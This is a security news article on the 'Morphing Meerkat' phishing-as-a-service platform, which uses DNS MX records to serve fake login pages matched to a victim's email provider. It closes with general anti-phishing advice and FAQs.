New phishing service exploits DNS MX records

Cybersecurity researchers have exposed a sophisticated phishing-as-a-service platform, Morphing Meerkat. This platform dynamically creates fake login pages tailored to the victim's email service provider by utilizing DNS MX records, leading to highly targeted credential theft.

What happened

Cybersecurity researchers have uncovered a new phishing-as-a-service (PhaaS) platform that uses Domain Name System (DNS) mail exchange (MX) records to generate fake login pages impersonating approximately 114 brands. This sophisticated platform, tracked by DNS intelligence firm Infoblox under the moniker "Morphing Meerkat," enables cybercriminals to target victims with highly convincing phishing attacks.

Going deeper

Morphing Meerkat operates by exploiting open redirects on advertising technology (adtech) infrastructure, compromising legitimate domains, and leveraging various channels, including Telegram, to distribute stolen credentials. 

The phishing scheme is estimated to have distributed thousands of spam emails, often using compromised WordPress sites and vulnerabilities in ad networks like Google-owned DoubleClick to bypass security filters. Additionally, the toolkit supports automatic translation of phishing content into over a dozen languages, including English, Korean, Spanish, Russian, German, Chinese, and Japanese, broadening its global reach.

What was said

Infoblox detailed the tactics used by Morphing Meerkat, stating: "The threat actor behind the campaigns often exploits open redirects on adtech infrastructure, compromises domains for phishing distribution, and distributes stolen credentials through several mechanisms, including Telegram."

The firm also highlighted the campaign's ability to dynamically serve phishing pages tailored to victims’ email service providers. "This attack method is advantageous to bad actors because it enables them to carry out targeted attacks on victims by displaying web content strongly related to their email service provider," they said.

Furthermore, the phishing landing pages employ various anti-analysis techniques:"In addition to complicating code readability via obfuscation and inflation, the phishing landing pages incorporate anti-analysis measures that prohibit the use of mouse right-click as well as keyboard hotkey combinations Ctrl + S (save the web page as HTML), Ctrl + U (open the web page source code)."

Why it matters 

Tailoring phishing pages based on victims' email service providers and implementing strong anti-detection techniques, cybercriminals are more likely to execute successful credential theft operations. This threatens both the individual users and organizations that rely on email for communication and business operations. 

If login credentials are compromised, attackers could gain unauthorized access to sensitive data, potentially leading to data breaches and financial losses.

See also: HIPAA Compliant Email: The Definitive Guide

What to look out for

Users should remain vigilant against phishing attempts by:

• Verifying the legitimacy of email links before clicking, especially those claiming to lead to shared documents.
• Checking the URL of any login page to ensure it matches the official website.
• Enabling multi-factor authentication (MFA) to add an extra layer of security.
• Being cautious of emails with urgent or alarming messages designed to provoke immediate action.
• Regularly updating security software and staying informed about emerging phishing tactics.

Related: Steps to protect against phishing attacks

FAQS

What is Phishing-as-a-Service (PhaaS)?

PhaaS is a model where cybercriminals offer ready-made phishing tools and infrastructure to other attackers, making it easier to launch phishing campaigns without advanced technical knowledge.

Why is phishing through DNS MX records particularly dangerous?

This method enhances the realism of phishing attacks by ensuring that victims see login pages that match their actual email provider, increasing the likelihood of credential theft.

How can businesses protect their employees from PhaaS attacks?

Businesses should implement email filtering solutions, conduct regular phishing awareness training, enforce strong password policies, and require multi-factor authentication for sensitive accounts.